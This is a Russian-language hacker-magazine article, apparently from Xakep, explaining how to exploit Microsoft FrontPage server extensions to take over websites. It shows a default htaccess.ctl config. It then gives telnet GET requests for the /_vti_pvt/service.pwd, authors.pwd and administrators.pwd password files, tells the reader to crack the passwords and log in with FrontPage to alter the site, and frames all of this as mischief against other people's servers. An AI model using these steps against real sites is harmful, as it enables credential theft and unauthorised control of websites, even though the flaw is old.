Настольная книга компьютерного исследователя


пользуемся маразмом имени frontpage

перед тем, как непосредственно рассказывать о этом баге скажу, что он далеко не нов и достаточно часто оказывается заткнут. но похожих багов — множество и как минимум из спортивного интереса и надежды наткнуться на сайт стоит таки про него узнать.

все наверняка знают, что такое microsoft frontpage. так вот, на многих сайтах для frontpage установлена особая поддержка — всякие примочки, облегчающие всем fronpage-дизайнерам жизнь. но ведь можно использовать эти «модные» примочки для жизненного свинства.

есть на свете (а точнее на сервере с ft extensions, той самой поддержкой) файл haccess.ctl,  который нас должен сильно волновать. некоторые называют его анало- гом shadow password file, но это бред. если проинсталировать дефолтовый ft ext, то вот как бу

дет выглядеть htaccess.ctl:

 # -FrontPage-
 Options None
 <Limit GET POST PUT>
 order deny,allow
 deny from all
 </Limit>
 AuthName default_realm
 AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
 AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp

после запуска сервера fpservwin.exe дополнительные сервисы устанавливаются или прямо на  http (80), или на http ssl (443) и ждет запросов. кстати те же возмож- ности можно использовать  через telnet на 80 или 443 при помощи команд GET, POST и PUT.

так вот. как мы видели — файл паролей лежит в www.target.com/_vti_pvt/service. pwd. теперь  нужно посмотреть, сможем ли мы взять этот файл с www. если нет, то можно попробовать зайти на ftp. для анонимных даунлоадов IIS держит имя IUSR_<имя компьютера>. имя компьютера можно получить при помощи netcat или nat. так вот:

 $telnet www.whorez.com 80
 GET /_vti_pvt/service.pwd
 ; теперь только для тех серверов, на которых стоит netscape server
 GET /_vti_pvt/authors.pwd
 GET /_vti_pvt/administrators.pwd

теперь расшифруем пароли и вперед! в frontpage выбираем open frontpage web и введя имя с паролем мы можем баловаться со станичкой сколько влезет! :)



©2013 Журнал Хакера Entries (RSS) and Comments (RSS)